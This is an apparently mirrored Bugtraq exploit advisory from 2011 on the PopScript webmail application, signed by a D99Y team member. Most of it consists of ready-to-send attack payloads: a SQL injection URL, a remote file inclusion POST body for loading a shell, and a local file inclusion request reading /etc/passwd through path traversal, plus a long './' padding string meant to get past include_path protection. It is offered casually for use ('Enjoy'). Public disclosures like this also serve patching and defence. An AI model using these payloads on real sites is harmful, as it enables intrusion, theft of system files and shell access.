PopScript Multiple Vulnerabilities

From: root@d99y.com
To: bugtraq@securityfocus.com
Cc:
Subject: PopScript Multiple Vulnerabilities
Date:


##########################################################
# Exploit Title: PopScript Multiple Vulnerabilities
# home : http://www.D99Y.com
# Google Dork: Do as you would be done by ; )
# Date: 5/6/2011 
# Author: NassRawI
# Software Link: http://www.popscript.com/
##########################################################
#
# [1] SQL injection
#
# http://localhost/PopScript/index.php?act=inbox&mode=1 [ SQL injection ]
#
# [2] File inclusion = require() 
#
# Remote File inclusion :
#
# exploit  :
#
# send in index.php  [ post ]
#
# email=root@d99y.com&mode=[Shell txt]?&password=nassrawi&remember=ON
#
# Local :
#
# exploit  :
#
# send in index.php  [ post ]
#
# email=root@d99y.com&mode=nassrawi../../../../../../etc/passwd&password=nassrawi
#
# You can skip protection include_path  ; )
#
# email=root@d99y.com&mode=nassrawi../../../../../../etc/passwd/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././
 ././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
 /./././././././././././././././././././././././././././././.!
 /./././.
/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
 /././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././
 ././././././././././././././././././././././././././././././!
 ././././
./././././.&password=nassrawi
#
#
##########################################################

Greetz :

D99Y Team and all members D99Y.CoM

Enjoy ; )





Copyright © 1995-2020 LinuxRocket.net. All rights reserved.